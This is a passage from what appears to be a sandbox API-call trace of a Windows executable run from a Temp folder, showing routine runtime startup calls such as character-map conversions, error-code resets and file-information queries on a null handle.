!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ컸ĐĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0101.932] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x09\x18gÛ\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0101.932] GetLastError () returned 0x0 [0101.932] SetLastError (dwErrCode=0x0) [0101.932] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0101.932] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ컸ĐĀ") returned 256 [0101.932] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ컸ĐĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0101.933] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ컸ĐĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0101.933] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x09\x18gÛ\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0101.933] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x111c370, nSize=0x104 | out: lpFilename="C:\\Users\\HJRD1K~1\\AppData\\Local\\Temp\\8162.exe") returned 0x2d [0101.933] GetLastError () returned 0x0 [0101.933] SetLastError (dwErrCode=0x0) [0101.933] GetLastError () returned 0x0 [0101.933] SetLastError (dwErrCode=0x0) [0101.934] GetLastError () returned 0x0 [0101.934] SetLastError (dwErrCode=0x0) [0101.934] GetLastError () returned 0x0 [0101.934] SetLastError (dwErrCode=0x0) [0101.934] GetLastError () returned 0x0 [0101.934] SetLastError (dwErrCode=0x0) [0101.934] GetLastError () returned 0x0 [0101.934] SetLastError (dwErrCode=0x0) [0101.935] GetLastError () returned 0x0 [0101.935] SetLastError (dwErrCode=0x0) [0101.935] GetLastError () returned 0x0 [0101.935] SetLastError (dwErrCode=0x0) [0101.935] GetLastError () returned 0x0 [0101.935] SetLastError (dwErrCode=0x0) [0101.935] GetLastError () returned 0x0 [0101.935] SetLastError (dwErrCode=0x0) [0101.935] GetLastError () returned 0x0 [0101.936] SetLastError (dwErrCode=0x0) [0101.936] GetLastError () returned 0x0 [0101.936] SetLastError (dwErrCode=0x0) [0101.936] GetLastError () returned 0x0 [0101.936] SetLastError (dwErrCode=0x0) [0101.936] GetLastError () returned 0x0 [0101.936] SetLastError (dwErrCode=0x0) [0101.936] GetLastError () returned 0x0 [0101.936] SetLastError (dwErrCode=0x0) [0101.937] GetLastError () returned 0x0 [0101.937] SetLastError (dwErrCode=0x0) [0101.937] GetLastError () returned 0x0 [0101.937] SetLastError (dwErrCode=0x0) [0101.937] GetLastError () returned 0x0 [0101.937] SetLastError (dwErrCode=0x0) [0101.937] GetLastError () returned 0x0 [0101.937] SetLastError (dwErrCode=0x0) [0101.938] GetLastError () returned 0x0 [0101.938] SetLastError (dwErrCode=0x0) [0101.938] GetLastError () returned 0x0 [0101.938] SetLastError (dwErrCode=0x0) [0101.938] GetLastError () returned 0x0 [0101.938] SetLastError (dwErrCode=0x0) [0101.938] GetLastError () returned 0x0 [0101.938] SetLastError (dwErrCode=0x0) [0101.938] GetLastError () returned 0x0 [0101.939] SetLastError (dwErrCode=0x0) [0101.939] GetLastError () returned 0x0 [0101.939] SetLastError (dwErrCode=0x0) [0101.939] GetLastError () returned 0x0 [0101.939] SetLastError (dwErrCode=0x0) [0101.939] GetLastError () returned 0x0 [0101.939] SetLastError (dwErrCode=0x0) [0101.939] GetLastError () returned 0x0 [0101.940] SetLastError (dwErrCode=0x0) [0101.940] GetLastError () returned 0x0 [0101.940] SetLastError (dwErrCode=0x0) [0101.940] GetLastError () returned 0x0 [0101.940] SetLastError (dwErrCode=0x0) [0101.940] GetLastError () returned 0x0 [0101.940] SetLastError (dwErrCode=0x0) [0101.940] GetLastError () returned 0x0 [0101.941] SetLastError (dwErrCode=0x0) [0101.941] GetLastError () returned 0x0 [0101.941] SetLastError (dwErrCode=0x0) [0101.941] GetLastError () returned 0x0 [0101.941] SetLastError (dwErrCode=0x0) [0101.941] GetLastError () returned 0x0 [0101.941] SetLastError (dwErrCode=0x0) [0101.941] GetLastError () returned 0x0 [0101.942] SetLastError (dwErrCode=0x0) [0101.942] GetLastError () returned 0x0 [0101.942] SetLastError (dwErrCode=0x0) [0101.942] GetLastError () returned 0x0 [0101.942] SetLastError (dwErrCode=0x0) [0101.942] GetLastError () returned 0x0 [0101.942] SetLastError (dwErrCode=0x0) [0101.943] GetLastError () returned 0x0 [0101.943] SetLastError (dwErrCode=0x0) [0101.943] GetLastError () returned 0x0 [0101.943] SetLastError (dwErrCode=0x0) [0101.943] GetLastError () returned 0x0 [0101.943] SetLastError (dwErrCode=0x0) [0101.943] GetLastError () returned 0x0 [0101.943] SetLastError (dwErrCode=0x0) [0101.944] GetLastError () returned 0x0 [0101.944] SetLastError (dwErrCode=0x0) [0101.944] GetLastError () returned 0x0 [0101.949] SetLastError (dwErrCode=0x0) [0101.949] GetLastError () returned 0x0 [0101.950] SetLastError (dwErrCode=0x0) [0101.950] GetLastError () returned 0x0 [0101.950] SetLastError (dwErrCode=0x0) [0101.951] GetLastError () returned 0x0 [0101.951] SetLastError (dwErrCode=0x0) [0101.951] GetLastError () returned 0x0 [0101.951] SetLastError (dwErrCode=0x0) [0101.951] GetLastError () returned 0x0 [0101.951] SetLastError (dwErrCode=0x0) [0101.951] GetLastError () returned 0x0 [0101.951] SetLastError (dwErrCode=0x0) [0101.952] GetLastError () returned 0x0 [0101.952] SetLastError (dwErrCode=0x0) [0101.952] GetLastError () returned 0x0 [0101.952] SetLastError (dwErrCode=0x0) [0101.952] GetLastError () returned 0x0 [0101.952] SetLastError (dwErrCode=0x0) [0101.952] GetLastError () returned 0x0 [0101.952] SetLastError (dwErrCode=0x0) [0101.953] GetLastError () returned 0x0 [0101.953] SetLastError (dwErrCode=0x0) [0101.953] GetLastError () returned 0x0 [0101.953] SetLastError (dwErrCode=0x0) [0101.953] GetLastError () returned 0x0 [0101.953] SetLastError (dwErrCode=0x0) [0101.953] GetLastError () returned 0x0 [0101.953] SetLastError (dwErrCode=0x0) [0101.954] GetLastError () returned 0x0 [0101.954] SetLastError (dwErrCode=0x0) [0101.954] GetLastError () returned 0x0 [0101.954] SetLastError (dwErrCode=0x0) [0101.954] GetLastError () returned 0x0 [0101.954] SetLastError (dwErrCode=0x0) [0101.954] GetLastError () returned 0x0 [0101.954] SetLastError (dwErrCode=0x0) [0101.955] GetLastError () returned 0x0 [0101.955] SetLastError (dwErrCode=0x0) [0101.955] GetLastError () returned 0x0 [0101.955] SetLastError (dwErrCode=0x0) [0101.955] GetLastError () returned 0x0 [0101.955] SetLastError (dwErrCode=0x0) [0101.955] GetLastError () returned 0x0 [0101.955] SetLastError (dwErrCode=0x0) [0101.956] GetLastError () returned 0x0 [0101.956] SetLastError (dwErrCode=0x0) [0101.956] GetLastError () returned 0x0 [0101.956] SetLastError (dwErrCode=0x0) [0101.956] GetLastError () returned 0x0 [0101.956] SetLastError (dwErrCode=0x0) [0101.956] GetLastError () returned 0x0 [0101.956] SetLastError (dwErrCode=0x0) [0101.957] GetLastError () returned 0x0 [0101.957] SetLastError (dwErrCode=0x0) [0101.957] GetLastError () returned 0x0 [0101.957] SetLastError (dwErrCode=0x0) [0101.957] GetLastError () returned 0x0 [0101.957] SetLastError (dwErrCode=0x0) [0101.957] GetLastError () returned 0x0 [0101.958] SetLastError (dwErrCode=0x0) [0101.958] GetLastError () returned 0x0 [0101.958] SetLastError (dwErrCode=0x0) [0101.958] GetLastError () returned 0x0 [0101.958] SetLastError (dwErrCode=0x0) [0101.958] GetLastError () returned 0x0 [0101.958] SetLastError (dwErrCode=0x0) [0101.958] GetLastError () returned 0x0 [0101.959] SetLastError (dwErrCode=0x0) [0101.959] GetLastError () returned 0x0 [0101.959] SetLastError (dwErrCode=0x0) [0101.959] GetLastError () returned 0x0 [0101.959] SetLastError (dwErrCode=0x0) [0101.959] GetLastError () returned 0x0 [0101.959] SetLastError (dwErrCode=0x0) [0101.960] GetLastError () returned 0x0 [0101.962] SetLastError (dwErrCode=0x0) [0101.962] GetLastError () returned 0x0 [0101.963] SetLastError (dwErrCode=0x0) [0101.963] GetLastError () returned 0x0 [0101.963] SetLastError (dwErrCode=0x0) [0101.963] GetLastError () returned 0x0 [0101.963] SetLastError (dwErrCode=0x0) [0101.963] GetLastError () returned 0x0 [0101.963] SetLastError (dwErrCode=0x0) [0101.963] GetLastError () returned 0x0 [0101.964] SetLastError (dwErrCode=0x0) [0101.964] GetLastError () returned 0x0 [0101.964] SetLastError (dwErrCode=0x0) [0101.964] GetLastError () returned 0x0 [0101.964] SetLastError (dwErrCode=0x0) [0101.964] GetLastError () returned 0x0 [0101.965] SetLastError (dwErrCode=0x0) [0101.965] GetLastError () returned 0x0 [0101.965] SetLastError (dwErrCode=0x0) [0101.967] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0101.967] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x11034c2) returned 0x0 [0101.967] GetLastError () returned 0x0 [0101.967] SetLastError (dwErrCode=0x0) [0101.968] GetLastError () returned 0x0 [0101.968] SetLastError (dwErrCode=0x0) [0101.968] GetLastError () returned 0x0 [0101.968] SetLastError (dwErrCode=0x0) [0101.968] GetLastError () returned 0x0 [0101.968] SetLastError (dwErrCode=0x0) [0101.968] GetLastError () returned 0x0 [0101.968] SetLastError (dwErrCode=0x0) [0101.969] GetLastError () returned 0x0 [0101.969] SetLastError (dwErrCode=0x0) [0101.969] GetLastError () returned 0x0 [0101.969] SetLastError (dwErrCode=0x0) [0101.969] GetLastError () returned 0x0 [0101.969] SetLastError (dwErrCode=0x0) [0101.969] GetLastError () returned 0x0 [0101.969] SetLastError (dwErrCode=0x0) [0101.969] GetLastError () returned 0x0 [0101.970] SetLastError (dwErrCode=0x0) [0101.970] GetLastError () returned 0x0 [0101.973] SetLastError (dwErrCode=0x0) [0101.974] GetLastError () returned 0x0 [0101.974] SetLastError (dwErrCode=0x0) [0101.974] GetLastError () returned 0x0 [0101.974] SetLastError (dwErrCode=0x0) [0101.974] GetLastError () returned 0x0 [0101.974] SetLastError (dwErrCode=0x0) [0101.974] GetLastError () returned 0x0 [0101.975] SetLastError (dwErrCode=0x0) [0101.975] GetLastError () returned 0x0 [0101.975] SetLastError (dwErrCode=0x0) [0101.975] GetLastError () returned 0x0 [0101.975] SetLastError (dwErrCode=0x0) [0101.975] GetLastError () returned 0x0 [0101.975] SetLastError (dwErrCode=0x0) [0101.975] GetLastError () returned 0x0 [0101.976] SetLastError (dwErrCode=0x0) [0101.976] GetLastError () returned 0x0 [0101.976] SetLastError (dwErrCode=0x0) [0101.976] GetLastError () returned 0x0 [0101.976] SetLastError (dwErrCode=0x0) [0101.976] GetLastError () returned 0x0 [0101.976] SetLastError (dwErrCode=0x0) [0101.976] GetLastError () returned 0x0 [0101.977] SetLastError (dwErrCode=0x0) [0101.977] GetLastError () returned 0x0 [0101.977] SetLastError (dwErrCode=0x0) [0101.977] GetLastError () returned 0x0 [0101.977] SetLastError (dwErrCode=0x0) [0101.977] GetLastError () returned 0x0 [0101.977] SetLastError (dwErrCode=0x0) [0101.977] GetLastError () returned 0x0 [0101.978] SetLastError (dwErrCode=0x0) [0101.978] GetLastError () returned 0x0 [0101.978] SetLastError (dwErrCode=0x0) [0101.978] GetLastError () returned 0x0 [0101.978] SetLastError (dwErrCode=0x0) [0101.978] GetLastError () returned 0x0 [0101.978] SetLastError (dwErrCode=0x0) [0101.978] GetLastError () returned 0x0 [0101.979] SetLastError (dwErrCode=0x0) [0101.979] GetLastError () returned 0x0 [0101.979] SetLastError (dwErrCode=0x0) [0101.979] GetLastError () returned 0x0 [0101.979] SetLastError (dwErrCode=0x0) [0101.979] GetLastError () returned 0x0 [0101.979] SetLastError (dwErrCode=0x0) [0101.979] GetLastError () returned 0x0 [0101.980] SetLastError (dwErrCode=0x0) [0101.980] GetLastError () returned 0x0 [0101.980] SetLastError (dwErrCode=0x0) [0101.980] GetLastError () returned 0x0 [0101.980] SetLastError (dwErrCode=0x0) [0101.980] GetLastError () returned 0x0 [0101.980] SetLastError (dwErrCode=0x0) [0101.980] GetLastError () returned 0x0 [0101.980] SetLastError (dwErrCode=0x0) [0101.981] GetLastError () returned 0x0 [0101.981] SetLastError (dwErrCode=0x0) [0101.981] GetLastError () returned 0x0 [0101.981] SetLastError (dwErrCode=0x0) [0101.981] GetLastError () returned 0x0 [0101.981] SetLastError (dwErrCode=0x0) [0101.981] GetLastError () returned 0x0 [0101.981] SetLastError (dwErrCode=0x0) [0101.981] GetLastError () returned 0x0 [0101.982] SetLastError (dwErrCode=0x0) [0101.982] GetLastError () returned 0x0 [0101.982] SetLastError (dwErrCode=0x0) [0101.983] GetLastError () returned 0x0 [0101.983] SetLastError (dwErrCode=0x0) [0101.983] GetLastError () returned 0x0 [0101.983] SetLastError (dwErrCode=0x0) [0101.983] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.984] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x756c0000 [0101.984] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.984] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.984] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.984] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.984] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.985] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.985] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.985] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.985] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.985] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.985] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.985] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.985] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.986] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.986] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.986] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.986] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.986] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.986] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.986] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.986] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.987] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.987] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.987] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.987] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.987] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.987] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.987] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.988] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.988] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.988] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.988] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.988] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.988] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.988] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.988] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.989] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.989] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.989] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.989] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.989] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: lpFileInformation=0x18fe80) returned 0 [0101.989] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x18fe80 | out: 